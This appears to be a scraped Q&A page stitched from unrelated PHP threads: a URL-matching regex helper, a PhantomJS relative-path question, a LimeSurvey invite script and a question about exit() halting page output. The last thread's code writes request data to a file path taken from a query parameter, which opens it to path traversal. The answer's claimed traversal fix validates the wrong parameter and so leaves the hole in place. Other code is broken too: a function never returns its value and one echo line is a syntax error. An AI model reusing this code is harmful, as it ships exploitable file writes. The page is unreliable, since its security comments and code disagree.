$regex = "/^(($thisProtocol:)?\/\/$thisSubdomain$thisDomainRegexed)?" . preg_replace('/index\\\..+$/i','?(index\..+)?', str_replace(array(".", "/"), array("\.", "\/"), $thisFilepath)) . '$/i';
if($debug)echo "\r\nregex is $regex\r\nComparing regex against $otherURL";
if (preg_match($regex, $otherURL))
{
if($debug)echo"\r\n\tIt's a match! Returning true...\r\n}\r\n-->";
return true;
}
else
{
if($debug)echo"\r\n\tOther URL is NOT a fully-qualified URL in this subdomain. Checking if it is relative...";
if($otherURL == $thisFilepath) // somewhat likely
{
if($debug)echo"\r\n\t\tOhter URL and this filepath are an exact match! Returning true...\r\n}\r\n-->";
return true;
}
else
{
if($debug)echo"\r\n\t\tFilepath is not an exact match. Testing against regex...";
$regex = regexFilepath($thisFilepath);
if($debug)echo"\r\n\t\tNew Regex is $regex";
if($debug)echo"\r\n\t\tComparing regex against $otherFilepath...";
if (preg_match($regex, $otherFilepath))
{
if($debug)echo"\r\n\t\t\tIt's a match! Returning true...\r\n}\r\n-->";
return true;
}
}
}
if($debug)echo"\r\nI tried my hardest, but couldn't match $otherURL to $thisURL. Returning false...\r\n}\r\n-->";
return false;
}
/**
* Uses the given filepath to create a regex that will match it in any of its relative representations.
*
* #param $path the filepath to be converted
*
* #return a regex that matches a all relative forms of the given filepath
*/
function regexFilepath($path)
{global $debug;
if($debug)echo"\r\nregexFilepath($path)\r\n{\r\n";
$filepathArray = explode("/", $path);
if (count($filepathArray) == 0)
throw new Exception("given parameter not a filepath: $path");
if ($filepathArray[0] == "") // this can happen if the path starts with a "/"
array_shift($filepathArray); // strip the first element off the array
$isIndex = preg_match("/^index\..+$/i", end($filepathArray));
$filename = array_pop($filepathArray);
if($debug){var_dump($filepathArray);}
$ret = '';
foreach($filepathArray as $i)
$ret = "(\.\.\/$ret$i\/)?"; // make a pseudo-recursive relative filepath
if($debug)echo "\r\n$ret";
$ret = preg_replace('/\)\?$/', '?)', $ret); // remove the last '?' and add one before the last '\/'
if($debug)echo "\r\n$ret";
$ret = '/^' . ($ret == '' ? '\.\/' : "((\.\/)|$ret)") . ($isIndex ? '(index\..+)?' : str_replace('.', '\.', $filename)) . '$/i'; // if this filepath leads to an index.php (etc.), then that filename is implied and irrelevant.
if($debug)echo'\r\n}\r\n';
}
This seems to match everything I need it to match, and not what I don't need it to.

phantomJS : Absolute path working, but Relative path giving problems

I'm on a Linux web server. The following files are being used to create a screenshot:
ons.php
ong.js
ons2.php
All these files along with phantomJS binary are in the same folder. The folder's permission is 744
ons.php
$forMonth = date('M Y');
exec('./phantomjs ons.js '.strtotime($forMonth), $op, $er);
print_r($op);
echo $er;
ons.js
var args = require('system').args;
var dt = '';
args.forEach(function(arg, i) {
if(i == 1)
{
dt = arg;
}
});
var page = require('webpage').create();
page.open('./ons2.php?dt='+dt, function () { //<--- This is failing
page.render('./xx.png');
phantom.exit();
});
ons2.php
<!DOCTYPE html>
<html>
<head>
<title>How are you</title>
</head>
<body>
<?php
if(isset($_GET['dt']))
{
echo $_GET['dt'];
}
else
{
echo '<h1>Did not work</h1>';
}
?>
</body>
</html>
On opening ons.php in the browser, I'm getting this result:
Array ( ) 0
But no screenshot is being created.
Debugging
On debugging a lot, I found out that it has to do with paths.
--> If I put the following inside ons.js
.
.
.
var page = require('webpage').create();
page.open('http://www.abc.com/ppt/ons2.php', function () { // <-- absolute path
page.render('./xx.png');
phantom.exit();
});
The screenshot is getting created. I want to avoid using absolute paths as the application will be shifted to a different domain pretty soon.
What I don't get is why relative path is not working even if all files are in the same folder. Is my syntax of page.open('./ons2.php....') wrong?

./ons2.php implies a local file. It will not be passed through to the web server, and moreover it will fail outright because you also appended a query string - in the local file system this would be treated as part of the file name, so the file will not be located at all.
You will need to supply an absolute URL for this to work as you expect - but you can determine this dynamically in PHP (using $_SERVER) and pass it in to the JS script as a command line argument.
For example (untested):
ons.php
<?php
// Determine the absolute URL of the directory containing this script
$baseURL = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' ? 'https' : 'http')
. '://' . $_SERVER['HTTP_HOST']
. rtrim(dirname($_SERVER['REQUEST_URI']), '/') . '/';
$now = new DateTime('now'); // Because all the cool kids use DateTime
$cmd = './phantomjs ons.js '
. escapeshellarg($now->format('M Y')) . ' ' // Don't forget to escape args!
. escapeshellarg($baseURL)
. ' 2>&1'; // let's capture STDERR as well
// Do your thang
exec($cmd, $op, $er);
print_r($op);
echo $er;
ons.js
var args, url, page;
args = require('system').args;
if (args.length < 3) {
console.error('Invalid arguments');
phantom.exit();
}
url = args[2] + 'ons2.php?dt=' + encodeURIComponent(args[1]);
console.log('Loading page: ' + url);
page = require('webpage').create();
page.open(url, function () {
page.render('./xx.png');
phantom.exit();
});
ons2.php remains the same.

Maybe there is an issue in page.render but I don't think so. The most common case of hangs is unhandled exception.
I will suggest you 4 things to investigate the issue :
add an handler to phantom.onError and/or to page.OnError
encapsulate your code in try/catch blocks (such as for page.render)
Once the page is loaded, there is no test on callback status. It's better to check the status ('success' or 'fail')
seems to freeze when calling page.render. Have you tried a simpler filename in the current directory? Maybe the freeze is because of the security or invalid filename (invalid characters?)
Hope this will help you

Yii::app()->lang doesn't work sometimes with LimeSurvey

I am working on a custom script to automatically send out invites and reminders. I have everything working fine up until a point. My function to send invites looks like this:
function sendInvites($iSurveyID) {
$oSurvey = Survey::model()->findByPk($iSurveyID);
if (!isset($oSurvey)) {
die("could not load survey");
}
if(!tableExists("{{tokens_$iSurveyID}}")) {
die("survey has no tokens or something");
}
$SQLemailstatuscondition = "emailstatus = 'OK'";
$SQLremindercountcondition = '';
$SQLreminderdelaycondition = '';
$iMaxEmails = (int)Yii::app()->getConfig("maxemails");
$iMaxReminders = 1;
if(!is_null($iMaxReminders)) {
$SQLremindercountcondition = "remindercount < " . $iMaxReminders;
}
$oTokens = Tokens_dynamic::model($iSurveyID);
$aResultTokens = $oTokens->findUninvited(false, $iMaxEmails, true, $SQLemailstatuscondition, $SQLremindercountcondition, $SQLreminderdelaycondition);
if (empty($aResultTokens)) {
die("No tokens to send invites to");
}
$aResult = emailTokens($iSurveyID, $aResultTokens, 'invite');
}
I also have a simple little file that starts up Yii:
Yii::createApplication('LSYii_Application', APPPATH . 'config/config' . EXT);
Yii::app()->loadHelper('admin/token');
Yii::app()->loadHelper('common');
Everything works as expected up until I actually try to send emails to the tokens. I've tracked the problem down to the following, on of the functions called by emailTokens has this in it:
$clang = Yii::app()->lang;
$aBasicTokenFields=array('firstname'=>array(
'description'=>$clang->gT('First name'),
'mandatory'=>'N',
'showregister'=>'Y'
),
The Yii::app()->lang part seems to be causing issues because then php is unable to call the gT method. However, when LimeSurvey is running "properly" this never happens. I can't even seem to find where "lang" is in the LimeSurvey source.
What can I do to make it work?

Why do you make it so hard on yourself and not use the RemoteControl2 API ?
See http://manual.limesurvey.org/wiki/RemoteControl_2_API#invite_participants
On that page you will also find a PHP example script.

maybe
Yii::import('application.libraries.Limesurvey_lang');
$clang = new Limesurvey_lang($oTokens->language);

PHP Not loading rest of page after exit;

I'm very new to PHP, and I can't figure out why this is happening.
For some reason, when exit fires the entire page stops loading, not just the PHP script. Like, it'll load the top half of the page, but nothing below where the script is included.
Here's my code:
$page = $_GET["p"] . ".htm";
if (!$_GET["p"]) {
echo("<h1>Please click on a page on the left to begin</h1>\n");
// problem here
exit;
}
if ($_POST["page"]) {
$handle = fopen("../includes/$page", "w");
fwrite($handle, $_POST["page"]);
fclose($handle);
echo("<p>Page successfully saved.</p>\n");
// problem here
exit;
}
if (file_exists("../includes/$page")) {
$FILE = fopen("../includes/$page", "rt");
while (!feof($FILE)) {
$text .= fgets($FILE);
}
fclose($FILE);
} else {
echo("<h1>Page "$page" does not exist.</h1>\n");
// echo("<h1>New Page: $page</h1>\n");
// $text = "<p></p>";
// problem here
exit;
}

Even if you have HTML code following your PHP code, from the web server's perspective it is strictly a PHP script. When exit() is called, that is the end of it. PHP will output process and output no more HTML, and the web server will not output anymore html. In other words, it is working exactly as it is supposed to work.
If you need to terminate the flow of PHP code execution without preventing any further HTML from being output, you will need to reorganize your code accordingly.
Here is one suggestion. If there is a problem, set a variable indicating so. In subsequent if() blocks, check to see if previous problems were encountered.
$problem_encountered = FALSE;
if (!$_GET["p"]) {
echo("<h1>Please click on a page on the left to begin</h1>\n");
// problem here
// Set a boolean variable indicating something went wrong
$problem_encountered = TRUE;
}
// In subsequent blocks, check that you haven't had problems so far
// Adding preg_match() here to validate that the input is only letters & numbers
// to protect against directory traversal.
// Never pass user input into file operations, even checking file_exists()
// without also whitelisting the input.
if (!$problem_encountered && $_GET["page"] && preg_match('/^[a-z0-9]+$/', $_GET["page"])) {
$page = $_GET["p"] . ".htm";
$handle = fopen("../includes/$page", "w");
fwrite($handle, $_GET["page"]);
fclose($handle);
echo("<p>Page successfully saved.</p>\n");
// problem here
$problem_encountered = TRUE;
}
if (!$problem_encountered && file_exists("../includes/$page")) {
$FILE = fopen("../includes/$page", "rt");
while (!feof($FILE)) {
$text .= fgets($FILE);
}
fclose($FILE);
} else {
echo("<h1>Page "$page" does not exist.</h1>\n");
// echo("<h1>New Page: $page</h1>\n");
// $text = "<p></p>";
// problem here
$problem_encountered = TRUE;
}
There are lots of ways to handle this, many of which are better than the example I provided. But this is a very easy way for you to adapt your existing code without needing to do too much reorganization or risk breaking much.

In PHP 5.3+ you can use the goto statement to jump to a label just before the ?> instead of using exit in the example given in the question.
It would'n work well with more structured code (jumping out of functions), tough.
Maybe this should be a comment, who knows.

Categories